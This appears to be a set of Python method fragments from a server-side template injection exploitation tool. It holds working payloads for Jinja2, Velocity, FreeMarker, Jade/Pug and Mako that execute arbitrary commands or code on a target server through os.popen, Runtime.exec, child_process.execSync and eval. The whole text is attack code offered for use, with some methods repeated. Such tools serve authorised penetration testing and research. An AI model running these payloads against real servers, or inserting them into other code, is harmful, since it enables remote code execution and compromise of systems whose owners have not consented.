def evaluate(self, code): return self.inject("""{%% set d = "%s" %%}{%% for c in [].__class__.__base__.__subclasses__() %%} {%% if c.__name__ == 'catch_warnings' %%} {%% for b in c.__init__.func_globals.values() %%} {%% if b.__class__ == {}.__class__ %%} {%% if 'eval' in b.keys() %%} {{ b['eval'](d) }} {%% endif %%} {%% endif %%} {%% endfor %%} {%% endif %%} {%% endfor %%}""" % (quote(code)))
def execute(self, command): # I've tested the techniques described in this article # http://blog.portswigger.net/2015/08/server-side-template-injection.html # for it didn't work. Still keeping the check active to cover previous # affected versions. return self.inject("""#set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("%s")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end""" % (quote(command)))
def execute(self, command): execution_code = '__import__("os").popen("%s").read()' % quote(command) return self.evaluate(execution_code)
def execute(self, command): return self.inject("""<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("%s") }""" % (quote(command)))
def execute(self, command): return self.inject( """<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("%s") }""" % (quote(command)))
def execute(self, code, prefix = None, suffix = None, blind = False): # Quote code before submitting it return super(Jade, self).execute(quote(code), prefix, suffix, blind)
def execute(self, command): execution_code = """= global.process.mainModule.require('child_process').execSync("%s")""" % quote(command) return self.inject(execution_code)
def execute(self, command): return self.inject("""<%% import os; x=os.popen("%s").read() %%>${x}""" % (quote(command)))
def execute(self, command): return self.evaluate("""system("%s");""" % (quote(command)))
def execute(self, command): execution_code = """= global.process.mainModule.require('child_process').execSync("%s")""" % quote( command) return self.inject(execution_code)
def evaluate(self, code, prefix = None, suffix = None, blind = False): # Quote code before submitting it return super(Jinja2, self).evaluate(quote(code), prefix, suffix, blind)